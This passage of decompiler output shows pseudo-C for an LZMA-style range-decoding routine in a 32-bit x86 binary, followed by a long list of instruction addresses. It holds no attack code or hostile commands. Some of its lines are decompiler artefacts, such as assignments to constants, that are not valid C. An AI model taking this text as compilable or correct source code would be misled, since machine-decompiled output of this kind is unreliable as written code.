                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              													while(1) {
                                                                                                                                                              														 *(_t621 - 0x88) = _t542;
                                                                                                                                                              														goto L1;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x50);
                                                                                                                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              												__eax =  *(__ebp - 0x58);
                                                                                                                                                              												__esi = __edx + __eax;
                                                                                                                                                              												 *(__ebp - 0x54) = __esi;
                                                                                                                                                              												__ax =  *__esi;
                                                                                                                                                              												__edi = __ax & 0x0000ffff;
                                                                                                                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              													__cx = __ax;
                                                                                                                                                              													__cx = __ax >> 5;
                                                                                                                                                              													__eax = __eax - __ecx;
                                                                                                                                                              													__edx = __edx + 1;
                                                                                                                                                              													__eflags = __edx;
                                                                                                                                                              													 *__esi = __ax;
                                                                                                                                                              													 *(__ebp - 0x50) = __edx;
                                                                                                                                                              												} else {
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													0x800 = 0x800 - __edi;
                                                                                                                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              													 *__esi = __cx;
                                                                                                                                                              												}
                                                                                                                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              													goto L148;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L146;
                                                                                                                                                              												}
                                                                                                                                                              											case 0x19:
                                                                                                                                                              												__eflags = __ebx - 4;
                                                                                                                                                              												if(__ebx < 4) {
                                                                                                                                                              													 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                              													L119:
                                                                                                                                                              													_t393 = __ebp - 0x2c;
                                                                                                                                                              													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                              													__eflags =  *_t393;
                                                                                                                                                              													L120:
                                                                                                                                                              													__eax =  *(__ebp - 0x2c);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													if(__eax == 0) {
                                                                                                                                                              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                              														goto L170;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                              													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                              														goto L171;
                                                                                                                                                              													}
                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                              													__eax =  *(__ebp - 0x30);
                                                                                                                                                              													_t400 = __ebp - 0x60;
                                                                                                                                                              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                              													__eflags =  *_t400;
                                                                                                                                                              													goto L123;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx = __ebx;
                                                                                                                                                              												__eax = __ebx;
                                                                                                                                                              												__ecx = __ebx >> 1;
                                                                                                                                                              												__eax = __ebx & 0x00000001;
                                                                                                                                                              												__ecx = (__ebx >> 1) - 1;
                                                                                                                                                              												__al = __al | 0x00000002;
                                                                                                                                                              												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                              												__eflags = __ebx - 0xe;
                                                                                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              												if(__ebx >= 0xe) {
                                                                                                                                                              													__ebx = 0;
                                                                                                                                                              													 *(__ebp - 0x48) = __ecx;
                                                                                                                                                              													L102:
                                                                                                                                                              													__eflags =  *(__ebp - 0x48);
                                                                                                                                                              													if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                              														__eax = __eax + __ebx;
                                                                                                                                                              														 *(__ebp - 0x40) = 4;
                                                                                                                                                              														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                              														__eax =  *(__ebp - 4);
                                                                                                                                                              														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														L108:
                                                                                                                                                              														__ebx = 0;
                                                                                                                                                              														 *(__ebp - 0x58) = __eax;
                                                                                                                                                              														 *(__ebp - 0x50) = 1;
                                                                                                                                                              														 *(__ebp - 0x44) = 0;
                                                                                                                                                              														 *(__ebp - 0x48) = 0;
                                                                                                                                                              														L112:
                                                                                                                                                              														__eax =  *(__ebp - 0x40);
                                                                                                                                                              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                              															_t391 = __ebp - 0x2c;
                                                                                                                                                              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                              															__eflags =  *_t391;
                                                                                                                                                              															goto L119;
                                                                                                                                                              														}
                                                                                                                                                              														__eax =  *(__ebp - 0x50);
                                                                                                                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                              														__eax =  *(__ebp - 0x58);
                                                                                                                                                              														__esi = __edi + __eax;
                                                                                                                                                              														 *(__ebp - 0x54) = __esi;
                                                                                                                                                              														__ax =  *__esi;
                                                                                                                                                              														__ecx = __ax & 0x0000ffff;
                                                                                                                                                              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                              														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                              															__ecx = 0;
                                                                                                                                                              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                              															__ecx = 1;
                                                                                                                                                              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                              															__ebx = 1;
                                                                                                                                                              															__ecx =  *(__ebp - 0x48);
                                                                                                                                                              															__ebx = 1 << __cl;
                                                                                                                                                              															__ecx = 1 << __cl;
                                                                                                                                                              															__ebx =  *(__ebp - 0x44);
                                                                                                                                                              															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                              															__cx = __ax;
                                                                                                                                                              															__cx = __ax >> 5;
                                                                                                                                                              															__eax = __eax - __ecx;
                                                                                                                                                              															__edi = __edi + 1;
                                                                                                                                                              															__eflags = __edi;
                                                                                                                                                              															 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              															 *__esi = __ax;
                                                                                                                                                              															 *(__ebp - 0x50) = __edi;
                                                                                                                                                              														} else {
                                                                                                                                                              															 *(__ebp - 0x10) = __edx;
                                                                                                                                                              															0x800 = 0x800 - __ecx;
                                                                                                                                                              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                              															 *__esi = __dx;
                                                                                                                                                              														}
                                                                                                                                                              														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              															L111:
                                                                                                                                                              															_t368 = __ebp - 0x48;
                                                                                                                                                              															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                              															__eflags =  *_t368;
                                                                                                                                                              															goto L112;
                                                                                                                                                              														} else {
                                                                                                                                                              															goto L109;
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              													__ecx =  *(__ebp - 0xc);
                                                                                                                                                              													__ebx = __ebx + __ebx;
                                                                                                                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                              														__ecx =  *(__ebp - 0x10);
                                                                                                                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                              														__ebx = __ebx | 0x00000001;
                                                                                                                                                              														__eflags = __ebx;
                                                                                                                                                              														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              													}
                                                                                                                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              														L101:
                                                                                                                                                              														_t338 = __ebp - 0x48;
                                                                                                                                                              														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                              														__eflags =  *_t338;
                                                                                                                                                              														goto L102;
                                                                                                                                                              													} else {
                                                                                                                                                              														goto L99;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												__edx =  *(__ebp - 4);
                                                                                                                                                              												__eax = __eax - __ebx;
                                                                                                                                                              												 *(__ebp - 0x40) = __ecx;
                                                                                                                                                              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                              												goto L108;
                                                                                                                                                              											case 0x1a:
                                                                                                                                                              												L56:
                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__ecx =  *(__ebp - 0x68);
                                                                                                                                                              												__al =  *(__ebp - 0x5c);
                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              												 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                              												__ecx =  *(__ebp - 0x14);
                                                                                                                                                              												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                              												__eax = __ecx + 1;
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              												__edx = _t192;
                                                                                                                                                              												goto L79;
                                                                                                                                                              											case 0x1b:
                                                                                                                                                              												L75:
                                                                                                                                                              												__eflags =  *(__ebp - 0x64);
                                                                                                                                                              												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              													 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                              													goto L170;
                                                                                                                                                              												}
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              												}
                                                                                                                                                              												__edx =  *(__ebp - 8);
                                                                                                                                                              												__cl =  *(__eax + __edx);
                                                                                                                                                              												__eax =  *(__ebp - 0x14);
                                                                                                                                                              												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              												 *(__eax + __edx) = __cl;
                                                                                                                                                              												__eax = __eax + 1;
                                                                                                                                                              												__edx = 0;
                                                                                                                                                              												_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              												__edx = _t274;
                                                                                                                                                              												__eax =  *(__ebp - 0x68);
                                                                                                                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              												_t283 = __ebp - 0x64;
                                                                                                                                                              												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                              												__eflags =  *_t283;
                                                                                                                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              												L79:
                                                                                                                                                              												 *(__ebp - 0x14) = __edx;
                                                                                                                                                              												goto L80;
                                                                                                                                                              											case 0x1c:
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L123:
                                                                                                                                                              													__eflags =  *(__ebp - 0x64);
                                                                                                                                                              													if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              														break;
                                                                                                                                                              													}
                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              													}
                                                                                                                                                              													__edx =  *(__ebp - 8);
                                                                                                                                                              													__cl =  *(__eax + __edx);
                                                                                                                                                              													__eax =  *(__ebp - 0x14);
                                                                                                                                                              													 *(__ebp - 0x5c) = __cl;
                                                                                                                                                              													 *(__eax + __edx) = __cl;
                                                                                                                                                              													__eax = __eax + 1;
                                                                                                                                                              													__edx = 0;
                                                                                                                                                              													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              													__edx = _t414;
                                                                                                                                                              													__eax =  *(__ebp - 0x68);
                                                                                                                                                              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                              													__eflags =  *(__ebp - 0x30);
                                                                                                                                                              													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                              													 *(__ebp - 0x14) = _t414;
                                                                                                                                                              													if( *(__ebp - 0x30) > 0) {
                                                                                                                                                              														continue;
                                                                                                                                                              													} else {
                                                                                                                                                              														L80:
                                                                                                                                                              														 *(__ebp - 0x88) = 2;
                                                                                                                                                              														goto L1;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              												 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                              												goto L170;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									L171:
                                                                                                                                                              									_t544 = _t543 | 0xffffffff;
                                                                                                                                                              									goto L172;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					goto L1;
                                                                                                                                                              				}
                                                                                                                                                              			}














                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x0040661d
                                                                                                                                                              0x00406623
                                                                                                                                                              0x00406629
                                                                                                                                                              0x00406643
                                                                                                                                                              0x00406646
                                                                                                                                                              0x0040664c
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406659
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040662b
                                                                                                                                                              0x0040663a
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x0040663e
                                                                                                                                                              0x00406663
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406665
                                                                                                                                                              0x00406669
                                                                                                                                                              0x00406818
                                                                                                                                                              0x0040682e
                                                                                                                                                              0x00406836
                                                                                                                                                              0x0040683d
                                                                                                                                                              0x0040683f
                                                                                                                                                              0x00406846
                                                                                                                                                              0x0040684a
                                                                                                                                                              0x0040684a
                                                                                                                                                              0x00406675
                                                                                                                                                              0x0040667c
                                                                                                                                                              0x00406684
                                                                                                                                                              0x00406687
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x0040668a
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e2c
                                                                                                                                                              0x00405e35
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e46
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e4f
                                                                                                                                                              0x00405e52
                                                                                                                                                              0x00405e55
                                                                                                                                                              0x00405e59
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e5f
                                                                                                                                                              0x00405e62
                                                                                                                                                              0x00405e64
                                                                                                                                                              0x00405e65
                                                                                                                                                              0x00405e68
                                                                                                                                                              0x00405e6a
                                                                                                                                                              0x00405e6b
                                                                                                                                                              0x00405e6d
                                                                                                                                                              0x00405e70
                                                                                                                                                              0x00405e75
                                                                                                                                                              0x00405e7a
                                                                                                                                                              0x00405e83
                                                                                                                                                              0x00405e96
                                                                                                                                                              0x00405e99
                                                                                                                                                              0x00405ea5
                                                                                                                                                              0x00405ecd
                                                                                                                                                              0x00405ecf
                                                                                                                                                              0x00405edd
                                                                                                                                                              0x00405edd
                                                                                                                                                              0x00405ee1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405ed4
                                                                                                                                                              0x00405ed5
                                                                                                                                                              0x00405ed5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ed1
                                                                                                                                                              0x00405eab
                                                                                                                                                              0x00405eb0
                                                                                                                                                              0x00405eb0
                                                                                                                                                              0x00405eb9
                                                                                                                                                              0x00405ec1
                                                                                                                                                              0x00405ec4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405eca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ee7
                                                                                                                                                              0x00405ee7
                                                                                                                                                              0x00405eeb
                                                                                                                                                              0x00406797
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406797
                                                                                                                                                              0x00405ef4
                                                                                                                                                              0x00405f04
                                                                                                                                                              0x00405f07
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0a
                                                                                                                                                              0x00405f0d
                                                                                                                                                              0x00405f11
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f13
                                                                                                                                                              0x00405f19
                                                                                                                                                              0x00405f43
                                                                                                                                                              0x00405f49
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f50
                                                                                                                                                              0x00405f1f
                                                                                                                                                              0x00405f22
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f27
                                                                                                                                                              0x00405f32
                                                                                                                                                              0x00405f3a
                                                                                                                                                              0x00405f3d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f82
                                                                                                                                                              0x00405f88
                                                                                                                                                              0x00405f8b
                                                                                                                                                              0x00405f98
                                                                                                                                                              0x00405fa0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f57
                                                                                                                                                              0x00405f5b
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067a6
                                                                                                                                                              0x00405f67
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f75
                                                                                                                                                              0x00405f78
                                                                                                                                                              0x00405f7b
                                                                                                                                                              0x00405f80
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406617
                                                                                                                                                              0x0040661d
                                                                                                                                                              0x00406623
                                                                                                                                                              0x00406629
                                                                                                                                                              0x00406643
                                                                                                                                                              0x00406646
                                                                                                                                                              0x0040664c
                                                                                                                                                              0x00406657
                                                                                                                                                              0x00406659
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060ae
                                                                                                                                                              0x004060b2
                                                                                                                                                              0x004060ba
                                                                                                                                                              0x004060bf
                                                                                                                                                              0x004060c1
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060c3
                                                                                                                                                              0x004060e5
                                                                                                                                                              0x004060ec
                                                                                                                                                              0x004060ef
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fa
                                                                                                                                                              0x004060fe
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067be
                                                                                                                                                              0x00406104
                                                                                                                                                              0x00406107
                                                                                                                                                              0x0040610a
                                                                                                                                                              0x0040610e
                                                                                                                                                              0x00406111
                                                                                                                                                              0x00406117
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x00406119
                                                                                                                                                              0x0040611c
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x0040611f
                                                                                                                                                              0x00406125
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406127
                                                                                                                                                              0x0040612a
                                                                                                                                                              0x0040612d
                                                                                                                                                              0x00406130
                                                                                                                                                              0x00406133
                                                                                                                                                              0x00406136
                                                                                                                                                              0x00406139
                                                                                                                                                              0x0040613c
                                                                                                                                                              0x0040613f
                                                                                                                                                              0x00406142
                                                                                                                                                              0x00406145
                                                                                                                                                              0x0040615d
                                                                                                                                                              0x00406160
                                                                                                                                                              0x00406163
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406169
                                                                                                                                                              0x0040616d
                                                                                                                                                              0x0040616f
                                                                                                                                                              0x00406147
                                                                                                                                                              0x00406147
                                                                                                                                                              0x0040614f
                                                                                                                                                              0x00406154
                                                                                                                                                              0x00406156
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406172
                                                                                                                                                              0x00406179
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061c2
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061cb
                                                                                                                                                              0x004061ce
                                                                                                                                                              0x004061d2
                                                                                                                                                              0x004061d5
                                                                                                                                                              0x004061db
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e9
                                                                                                                                                              0x00406187
                                                                                                                                                              0x00406187
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061ee
                                                                                                                                                              0x004061f1
                                                                                                                                                              0x004061f4
                                                                                                                                                              0x004061f7
                                                                                                                                                              0x004061fa
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406203
                                                                                                                                                              0x00406206
                                                                                                                                                              0x00406209
                                                                                                                                                              0x00406221
                                                                                                                                                              0x00406224
                                                                                                                                                              0x00406227
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622d
                                                                                                                                                              0x00406231
                                                                                                                                                              0x00406233
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x00406213
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621a
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x00406236
                                                                                                                                                              0x0040623d
                                                                                                                                                              0x00406240
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x0040629f
                                                                                                                                                              0x004062a2
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406614
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065de
                                                                                                                                                              0x004065e2
                                                                                                                                                              0x0040653f
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406318
                                                                                                                                                              0x00406318
                                                                                                                                                              0x0040631c
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
